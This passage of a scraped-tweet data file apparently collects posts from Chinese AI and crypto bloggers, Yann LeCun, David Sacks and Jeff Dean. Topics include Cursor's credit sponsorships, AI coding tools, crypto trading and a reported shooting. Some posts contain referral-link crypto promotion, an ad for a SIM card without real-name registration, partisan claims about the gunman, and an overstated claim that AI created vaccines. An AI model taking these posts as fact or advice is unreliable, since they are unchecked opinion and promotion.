"url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Design 虽好,但是额度不够用啊😮‍💨", + "url": "https://x.com/frxiaobei/status/2048356561131905177", + "published_at": "2026-04-26T11:00:35+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/Stakka", + "url": "https://x.com/Stv_Lynn/status/2048109925612851296", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 2. 继续 push 一下 stekka\n之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用\n现在发现主流 SOTA 模型已经能很稳定地产出 swift 了\n自动化测试也通过 AXE 搞定了✅", + "url": "https://x.com/Stv_Lynn/status/2048109922936910037", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of 